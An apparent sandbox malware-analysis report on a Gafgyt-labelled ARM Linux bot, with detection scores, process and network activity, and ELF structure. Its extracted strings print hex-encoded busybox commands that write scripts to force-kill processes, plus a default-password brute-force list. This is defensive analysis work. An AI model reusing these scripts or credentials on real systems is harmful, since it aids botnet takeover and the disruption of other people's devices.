Edit tour

Linux Analysis Report
arm5.elf

Overview

General Information

Sample name:arm5.elf
Analysis ID:1654459
MD5:86e67690c30c8967d803e0f609259b54
SHA1:566448bd1e208b19526d19b4a547c4311a92b866
SHA256:3db8ba259d2aea79d95aaa9ddb8f5d5fb45e7122b98ab150992506a64daecb6c
Tags:elfuser-abuse_ch
Infos:

Detection

Score:48
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Enumerates processes within the "proc" file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1654459
Start date and time:2025-04-02 11:20:14 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 32s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm5.elf
Detection:MAL
Classification:mal48.linELF@0/4@2/0
Command:/tmp/arm5.elf
PID:5532
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
For God so loved the world
Standard Error:
  • system is lnxubuntu20
  • arm5.elf (PID: 5532, Parent: 5452, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm5.elf
    • arm5.elf New Fork (PID: 5536, Parent: 5532)
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: arm5.elfReversingLabs: Detection: 41%
Source: arm5.elfVirustotal: Detection: 42%Perma Link
Source: /tmp/arm5.elf (PID: 5536)Socket: 127.0.0.1:22448Jump to behavior
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x77\x68\x69\x6c\x65\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x3b\x20\x64\x6f\x20\x6d\x70\x3d\x24\x28\x65\x63\x68\x6f\x20\x22\x24" > kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6c\x22\x20\x7c\x20\x61\x77\x6b\x20\x27\x7b\x70\x72\x69\x6e\x74\x20\x24\x32\x7d\x27\x20\x7c\x20\x73\x65\x64\x20\x27\x73\x2f\x5c" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x5c\x30\x34\x30\x2f\x20\x2f\x67\x27\x29\x3b\x20\x63\x61\x73\x65\x20\x22\x24\x6d\x70\x22\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x5b\x30\x2d\x39\x5d\x2a\x29\x20\x70\x69\x64\x3d\x24\x7b\x6d\x70\x23\x2f\x70\x72\x6f\x63\x2f\x7d\x3b\x20\x5b\x20\x2d\x64\x20\x22" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x2f\x70\x72\x6f\x63\x2f\x24\x70\x69\x64\x22\x20\x5d\x20\x26\x26\x20\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x22\x20" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26\x26\x20\x75\x6d\x6f\x75\x6e\x74\x20\x22\x24\x6d\x70\x22\x20\x32\x3e\x2f\x64" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x2f\x70\x72\x6f\x63\x2f\x6d\x6f\x75" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6e\x74\x73" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6e\x75\x6d\x3d\x22\x24\x7b\x70\x69\x64\x23\x23\x2a\x2f\x7d\x22\x3b\x20\x69\x66\x20\x5b\x20\x2d\x72\x20\x22\x24\x70\x69\x64\x2f" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6d\x61\x70\x73\x22\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x74\x72\x75\x65\x3b\x20\x77" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x68\x69\x6c\x65\x20\x49\x46\x53\x3d\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x69\x6e\x65\x3b\x20\x64\x6f\x20\x63\x61\x73\x65\x20" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x22\x24\x6c\x69\x6e\x65\x22\x20\x69\x6e\x20\x2a\x22\x2f\x6c\x69\x62\x2f\x22\x2a\x7c\x2a\x22\x2f\x6c\x69\x62\x36\x34\x2f\x22\x2a" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x7c\x2a\x22\x2e\x73\x6f\x22\x2a\x29\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x66\x61\x6c\x73\x65\x3b\x20\x62\x72\x65\x61" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6b\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x22\x24\x70\x69\x64\x2f\x6d\x61\x70\x73\x22\x3b\x20\x69\x66" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x20\x5b\x20\x22\x24\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x22\x20\x3d\x20\x74\x72\x75\x65\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x5f\x6e\x75\x6d\x22\x3b\x20\x66\x69\x3b\x20\x66\x69\x3b\x20\x64\x6f\x6e\x65" >> swan
Source: Initial sampleString containing 'busybox' found: sh kmount/bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
Source: Initial sampleString containing potential weak password found: 12345
Source: Initial sampleString containing potential weak password found: 54321
Source: Initial sampleString containing potential weak password found: 654321
Source: Initial sampleString containing potential weak password found: admin1234
Source: Initial sampleString containing potential weak password found: administrator
Source: Initial sampleString containing potential weak password found: supervisor
Source: Initial sampleString containing potential weak password found: password
Source: Initial sampleString containing potential weak password found: default
Source: Initial sampleString containing potential weak password found: guest
Source: Initial sampleString containing potential weak password found: service
Source: Initial sampleString containing potential weak password found: support
Source: ELF static info symbol of initial sample.symtab present: no
Source: classification engineClassification label: mal48.linELF@0/4@2/0
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/1333/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/1333/fdJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/1333/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/1695/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/1695/fdJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/1695/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/118/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/119/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/911/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/3876/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/3876/fdJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/3876/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/10/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/917/fdJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/11/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/12/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/13/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/14/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/15/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/16/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/17/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/18/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/19/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/1591/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/1591/fdJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/1591/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/120/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/121/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/1/mapsJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/1/fdJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/122/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/243/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/2/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/123/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/3/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/124/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/1588/fdJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/125/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/4/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/246/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/126/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/5/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/127/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/6/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/1585/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/1585/fdJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/1585/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/128/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/7/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/129/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/8/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/800/fdJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/9/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/802/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/802/fdJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/802/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/803/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/803/fdJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/803/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/804/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/804/fdJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/804/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/20/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/21/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/3407/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/3407/fdJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/3407/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/22/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/23/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/24/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/25/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/26/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/27/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/28/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/29/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/1484/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/1484/fdJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/1484/mapsJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/1484/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/490/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/490/fdJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/490/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/250/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/130/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)File opened: /proc/251/cmdlineJump to behavior
Source: /tmp/arm5.elf (PID: 5532)Queries kernel information via 'uname': Jump to behavior
Source: arm5.elf, 5532.1.00007ffcbff1a000.00007ffcbff3b000.rw-.sdmpBinary or memory string: /tmp/qemu-open.WoMnMv
Source: arm5.elf, 5532.1.00007ffcbff1a000.00007ffcbff3b000.rw-.sdmp, arm5.elf, 5536.1.00007ffcbff1a000.00007ffcbff3b000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm5.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm5.elf
Source: arm5.elf, 5536.1.00007f9a3003a000.00007f9a30041000.rw-.sdmpBinary or memory string: vmware
Source: arm5.elf, 5532.1.000055fae2210000.000055fae235f000.rw-.sdmp, arm5.elf, 5536.1.000055fae2210000.000055fae235f000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
Source: arm5.elf, 5532.1.00007f9a3003a000.00007f9a30041000.rw-.sdmp, arm5.elf, 5536.1.00007f9a3003a000.00007f9a30041000.rw-.sdmpBinary or memory string: qemu-arm
Source: arm5.elf, 5536.1.00007ffcbff1a000.00007ffcbff3b000.rw-.sdmpBinary or memory string: Uqemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: arm5.elf, 5532.1.000055fae2210000.000055fae235f000.rw-.sdmp, arm5.elf, 5536.1.000055fae2210000.000055fae235f000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: arm5.elf, 5532.1.00007ffcbff1a000.00007ffcbff3b000.rw-.sdmp, arm5.elf, 5536.1.00007ffcbff1a000.00007ffcbff3b000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: arm5.elf, 5536.1.00007ffcbff1a000.00007ffcbff3b000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: arm5.elf, 5532.1.00007ffcbff1a000.00007ffcbff3b000.rw-.sdmpBinary or memory string: U/tmp/qemu-open.WoMnMv:
Source: arm5.elf, 5532.1.00007f9a3003a000.00007f9a30041000.rw-.sdmp, arm5.elf, 5536.1.00007f9a3003a000.00007f9a30041000.rw-.sdmpBinary or memory string: !!a1gAWFxuAXsFWUgBRQAA!!a1gAWFxuAXsAWUgKRXgA!!a1gAWFxuAXsAWEgJR3IA!!a10CWFxuAHsGWVcWQHAA!!a10CWFxuAHsGWVcWQHUA!!aFwAWF9uA3sGW0gLRgAA!!aFwAWFlpG2QBW0gJTwAA!!qemu-arm2QBW0gJTwAA!
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume Access1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Non-Application Layer Protocol
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkit1
Brute Force
Application Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1654459 Sample: arm5.elf Startdate: 02/04/2025 Architecture: LINUX Score: 48 11 daisy.ubuntu.com 2->11 13 Multi AV Scanner detection for submitted file 2->13 7 arm5.elf 2->7         started        signatures3 process4 process5 9 arm5.elf 7->9         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
arm5.elf42%ReversingLabsLinux.Backdoor.Gafgyt
arm5.elf42%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.24
truefalse
    high
    No contacted IP infos
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    daisy.ubuntu.comefea6.elfGet hashmaliciousUnknownBrowse
    • 162.213.35.25
    xd.powerpc-440fp.elfGet hashmaliciousMiraiBrowse
    • 162.213.35.24
    xd.m68k.elfGet hashmaliciousMiraiBrowse
    • 162.213.35.25
    xd.ppc.elfGet hashmaliciousMiraiBrowse
    • 162.213.35.25
    xd.i686.elfGet hashmaliciousMiraiBrowse
    • 162.213.35.24
    xd.arm6.elfGet hashmaliciousMiraiBrowse
    • 162.213.35.24
    xd.arc.elfGet hashmaliciousMiraiBrowse
    • 162.213.35.24
    mpsl.elfGet hashmaliciousUnknownBrowse
    • 162.213.35.24
    sh4.elfGet hashmaliciousUnknownBrowse
    • 162.213.35.24
    s-h.4-.Sakura.elfGet hashmaliciousGafgyt, MiraiBrowse
    • 162.213.35.24
    No context
    No context
    No context
    Process:/tmp/arm5.elf
    File Type:data
    Category:dropped
    Size (bytes):14
    Entropy (8bit):3.521640636343319
    Encrypted:false
    SSDEEP:3:TggLAJ5:Tgg03
    MD5:A737667E3E61E716C83359F35BC141DA
    SHA1:E7C3DBC96B90E28F18CFB1CADE0C7AF673FFAA57
    SHA-256:2D8A0F430A3339E16B223D653251534539D95B1DF7142834F68D9172B1656E37
    SHA-512:0ACAFC3F3F40EDEF3D9F2F1CCE09BAF5004FD8488434F4903F18B9B7E77B4A6CDF7F84A47856CB2FDAA4B1B0F70FC2A3EDDE82BD29831FF54CB75F4E4C74FE74
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:/tmp/arm5.elf.
    Process:/tmp/arm5.elf
    File Type:data
    Category:dropped
    Size (bytes):14
    Entropy (8bit):3.521640636343319
    Encrypted:false
    SSDEEP:3:TggLAJ5:Tgg03
    MD5:A737667E3E61E716C83359F35BC141DA
    SHA1:E7C3DBC96B90E28F18CFB1CADE0C7AF673FFAA57
    SHA-256:2D8A0F430A3339E16B223D653251534539D95B1DF7142834F68D9172B1656E37
    SHA-512:0ACAFC3F3F40EDEF3D9F2F1CCE09BAF5004FD8488434F4903F18B9B7E77B4A6CDF7F84A47856CB2FDAA4B1B0F70FC2A3EDDE82BD29831FF54CB75F4E4C74FE74
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:/tmp/arm5.elf.
    Process:/tmp/arm5.elf
    File Type:data
    Category:dropped
    Size (bytes):14
    Entropy (8bit):3.521640636343319
    Encrypted:false
    SSDEEP:3:TggLAJ5:Tgg03
    MD5:A737667E3E61E716C83359F35BC141DA
    SHA1:E7C3DBC96B90E28F18CFB1CADE0C7AF673FFAA57
    SHA-256:2D8A0F430A3339E16B223D653251534539D95B1DF7142834F68D9172B1656E37
    SHA-512:0ACAFC3F3F40EDEF3D9F2F1CCE09BAF5004FD8488434F4903F18B9B7E77B4A6CDF7F84A47856CB2FDAA4B1B0F70FC2A3EDDE82BD29831FF54CB75F4E4C74FE74
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:/tmp/arm5.elf.
    Process:/tmp/arm5.elf
    File Type:ASCII text
    Category:dropped
    Size (bytes):355
    Entropy (8bit):3.818462439917049
    Encrypted:false
    SSDEEP:6:M6gDFz0H/VU8VbsDFz0NNVFT/V/3VVyAb/rVmsVot/VOArB/VH:3YB02EbEB0TvVVIAbyl
    MD5:108AABC01874821C9209A280F1CAA40B
    SHA1:1927FB56D02AB5DBAEF3D09021176BC13BDF798F
    SHA-256:F51D934C20EE51DBA123B78ECDB54EF63DA8D3F03A15B6AB17EBFD42C5BD6F1D
    SHA-512:B168F18E38AD72F8B8B5A07DF3CB56ABE406EC07865EFDBAAD0EFB60C5D092CB6B046692248918223AB47E620D7EDAF06B902EEEB302C1C2AF83A7F7F9874A7F
    Malicious:false
    Reputation:low
    Preview:8000-22000 r-xp 00000000 fd:00 531606 /tmp/arm5.elf.2a000-2b000 rw-p 0001a000 fd:00 531606 /tmp/arm5.elf.2b000-32000 rw-p 00000000 00:00 0 .ff7ee000-ff7ef000 r--p 00000000 fd:00 793309 /usr/lib/x86_64-linux-gnu/libm-2.31.so.ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
    File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), dynamically linked, stripped
    Entropy (8bit):6.150599367260582
    TrID:
    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
    File name:arm5.elf
    File size:107'272 bytes
    MD5:86e67690c30c8967d803e0f609259b54
    SHA1:566448bd1e208b19526d19b4a547c4311a92b866
    SHA256:3db8ba259d2aea79d95aaa9ddb8f5d5fb45e7122b98ab150992506a64daecb6c
    SHA512:56b279fda6f57bbaf35cf36f6067287dbb47fc96048efbe0d7612a1ff47f10a7f21b02b3ea6ed517280689a7938b8d420f86ecf4af1bfb20dde7ab6b8d347df8
    SSDEEP:3072:/wyIxMYZtAjVXtzULUYnN8tZdSzcrrFmulElrrhCadM:/wyIxMYZtY9HYKo+Fm0ElPh2
    TLSH:A4A30999B8919B66C5D406BFFE1F528D33231BF8E2DB3107DD14AB2077CA51A092F541
    File Content Preview:.ELF..............(.....l...4...(.......4. ...(.........T...T...T.......................................................................TH...........................................@-..@............/..@-.,@...0....S..... 0....S.........../..0...0...@..../

    ELF header

    Class:ELF32
    Data:2's complement, little endian
    Version:1 (current)
    Machine:ARM
    Version Number:0x1
    Type:EXEC (Executable file)
    OS/ABI:UNIX - System V
    ABI Version:0
    Entry Point Address:0x816c
    Flags:0x4000002
    ELF Header Size:52
    Program Header Offset:52
    Program Header Size:32
    Number of Program Headers:4
    Section Header Offset:106792
    Section Header Size:40
    Number of Section Headers:12
    Header String Table Index:11
    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
    NULL0x00x00x00x00x0000
    .initPROGBITS0x80b40xb40x140x00x6AX001
    .textPROGBITS0x80c80xc80x16fdc0x00x6AX004
    .finiPROGBITS0x1f0a40x170a40x140x00x6AX001
    .rodataPROGBITS0x1f0b80x170b80x289c0x00x2A004
    .ARM.exidxARM_EXIDX0x219540x199540xc80x00x82AL204
    .init_arrayINIT_ARRAY0x2a0040x1a0040x40x00x3WA004
    .fini_arrayFINI_ARRAY0x2a0080x1a0080x40x00x3WA004
    .gotPROGBITS0x2a0100x1a0100x280x40x3WA004
    .dataPROGBITS0x2a0380x1a0380x980x00x3WA004
    .bssNOBITS0x2a0d00x1a0d00x47880x00x3WA008
    .shstrtabSTRTAB0x00x1a0d00x580x00x0001
    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
    DYNAMIC0x199540x219540x219540xc80xc84.32970x4R 0x4.ARM.exidx
    LOAD0x00x80000x80000x19a1c0x19a1c6.21060x5R E0x8000.init .text .fini .rodata .ARM.exidx
    LOAD0x1a0040x2a0040x2a0040xcc0x48543.63640x6RW 0x8000.init_array .fini_array .got .data .bss
    DYNAMIC0x00x00x00x00x00.00000x7RWE0x4

    Download Network PCAP: filteredfull

    TimestampSource PortDest PortSource IPDest IP
    Apr 2, 2025 11:21:02.644490957 CEST4408153192.168.2.151.1.1.1
    Apr 2, 2025 11:21:02.644490957 CEST3516653192.168.2.151.1.1.1
    Apr 2, 2025 11:21:02.749730110 CEST53440811.1.1.1192.168.2.15
    Apr 2, 2025 11:21:02.750065088 CEST53351661.1.1.1192.168.2.15
    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    Apr 2, 2025 11:21:02.644490957 CEST192.168.2.151.1.1.10x7529Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
    Apr 2, 2025 11:21:02.644490957 CEST192.168.2.151.1.1.10x2495Standard query (0)daisy.ubuntu.com28IN (0x0001)false
    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Apr 2, 2025 11:21:02.749730110 CEST1.1.1.1192.168.2.150x7529No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
    Apr 2, 2025 11:21:02.749730110 CEST1.1.1.1192.168.2.150x7529No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

    System Behavior

    Start time (UTC):09:21:00
    Start date (UTC):02/04/2025
    Path:/tmp/arm5.elf
    Arguments:-
    File size:4956856 bytes
